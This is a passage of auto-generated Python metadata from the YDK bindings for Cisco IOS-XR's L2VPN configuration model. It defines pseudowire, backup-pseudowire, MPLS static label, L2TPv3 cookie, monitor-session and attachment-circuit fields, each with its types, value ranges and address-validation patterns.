[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv4 address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
False,
[
_MetaInfoClassMember('pseudowire-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv6 address. A pseudowire
can have only one address: IPv4 or IPv6
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
False,
[
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('neighbor', REFERENCE_LIST, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
[], [],
''' keys: neighbor
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-address', REFERENCE_LIST, 'PseudowireAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
[], [],
''' keys: pseudowire-address
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
False,
[
_MetaInfoClassMember('pseudowire', REFERENCE_LIST, 'Pseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
[], [],
''' Pseudowire configuration
''',
'pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Name of the monitor session
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable monitor session segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-session',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
False,
[
_MetaInfoClassMember('monitor-session', REFERENCE_LIST, 'MonitorSession' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
[], [],
''' Monitor session segment
''',
'monitor_session',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-sessions',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target Global ID
''',
'global_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('prefix', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Target Prefix
''',
'prefix',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('sacid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Source AC ID
''',
'sacid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routed',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
False,
[
_MetaInfoClassMember('pseudowire-routed', REFERENCE_LIST, 'PseudowireRouted' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
[], [],
''' Pseudowire configuration
''',
'pseudowire_routed',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routeds',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable attachment circuit interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
False,
[
